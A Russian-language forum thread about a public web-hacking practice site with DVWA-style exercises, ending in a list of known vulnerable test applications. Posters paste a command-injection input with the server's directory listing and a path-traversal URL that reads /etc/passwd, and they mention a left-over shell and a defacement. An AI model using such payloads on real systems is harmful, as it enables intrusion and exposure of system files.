Площадка для тренировки по взлому
 

Площадка для тренировки по взлому.
Имеется 3 уровня сложности.
Что не работает пишем суда.

-------------------------------------------
Взламывай на здоровье ! (В.Н.З.)
--------------------------------------------

признаю свою ошибку, не видел выбор уровня

;ls -la
total 716
drwx------ 8 whatthis customers 4096 Dec 23 20:07 .
drwx------ 3 whatthis customers 4096 Sep 14 13:49 ..
-rw------- 1 whatthis customers 143 Dec 23 20:07 .htaccess
-rw------- 1 whatthis customers 2517 Dec 23 20:07 CHANGELOG.txt
-rw------- 1 whatthis customers 32485 Dec 23 20:07 COPYING.txt
-rw------- 1 whatthis customers 553472 Nov 13 14:38 MyProxy.exe
-rw------- 1 whatthis customers 3194 Dec 23 20:07 README.txt
-rw------- 1 whatthis customers 1538 Dec 23 20:07 SQLi.php
-rw------- 1 whatthis customers 383 Dec 23 20:07 about.php
drwx------ 2 whatthis customers 4096 Nov 28 22:51 admin
drwx------ 3 whatthis customers 4096 Dec 23 20:23 board
-rw------- 1 whatthis customers 1391 Dec 23 20:07 brute.php
drwx------ 2 whatthis customers 4096 Sep 14 13:49 cgi-bin
-rw------- 1 whatthis customers 152 Dec 23 20:07 config.php
-rw------- 1 whatthis customers 1274 Dec 23 20:07 csrf.php
-rw------- 1 whatthis customers 1112 Dec 23 20:07 exec.php
-rw------- 1 whatthis customers 358 Dec 23 20:07 fi.php
-rw------- 1 whatthis customers 711 Dec 23 20:07 fi_content.php
drwx------ 5 whatthis customers 4096 Dec 23 20:07 includes
-rw------- 1 whatthis customers 911 Dec 23 20:11 index.php
-rw------- 1 whatthis customers 1434 Dec 23 20:07 main.css
-rw------- 1 whatthis customers 20594 Nov 13 14:39 myproxy.zip
-rw------- 1 whatthis customers 148 Dec 23 20:07 php.ini
-rw------- 1 whatthis customers 19 Dec 23 20:07 phpinfo.php
drw-rw-rw- 6 whatthis customers 4096 Oct 14 19:59 quest
-rw------- 1 whatthis customers 25 Dec 23 20:07 robots.txt
-rw------- 1 whatthis customers 831 Dec 23 20:07 security.php
-rw------- 1 whatthis customers 2024 Dec 23 20:07 setup.php
-rw------- 1 whatthis customers 757 Dec 23 20:07 upload.php
drwx------ 2 whatthis customers 4096 Dec 23 21:00 uploads
-rw------- 1 whatthis customers 1775 Dec 23 20:07 xss.php

http://tortop.msk.ru/dvwa/includes/source/fi_source.php

Ошибка. Ссылка не работает.

Ну если я ограничился просто добавлением die(); то другие могли снести сайт под корень, совсем не продумал ты ничего, фактически оставил шелл на сайте, а ведь у тебя там есть и другие проекты (к примеру naume.ru) к которым можно перелезть, залив шелл на сайт для тренинга.

P.S. а ну вот видишь теперь кто то уже написал "Haked by Webkill".
P.P.S. могу бы хотя бы права на запись убрать для начала.
Ну а вообще смысла в идеи не вижу.

эх я отошел не дали мне время )

БАЛИН сайт для тренировки а не для того чтобы всё изговнеть Понял webkill !!!!

http://tortop.msk.ru/fi.php?page=../../../../../../../../etc/passwd%00

Online-ресурсы для проведения аудита (читай: площадки для тренировки по взлому):

1) тестовые сайты от Acunetix:

- http://testphp.acunetix.com/ (PHP);
- http://testasp.acunetix.com/ (ASP);
- http://testaspnet.acunetix.com/ (ASP.NET);

2) тестовый сайт от HP: http://zero.webappsecurity.com/banklogin.asp?serviceName=FreebankCaastAccess&temp lateName=prod_sel.forte&source=Freebank&AD_REFERRI NG_URL=http://www.Freebank.com

3) тестовый сайт от IBM: http://demo.testfire.net/

Сборки уязвимых web-приложений (для самостоятельной установки):

1) Stanford SecuriBench: http://suif.stanford.edu/~livshits/securibench/
2) OWASP WebGoat: http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project

3) Mutillidae: http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10


Проекты аналогичной тематики рассчитаны на аудиторию, от которой можно ожидать всего что угодно, поэтому и проектируются они stand-alone от рабочих проектов.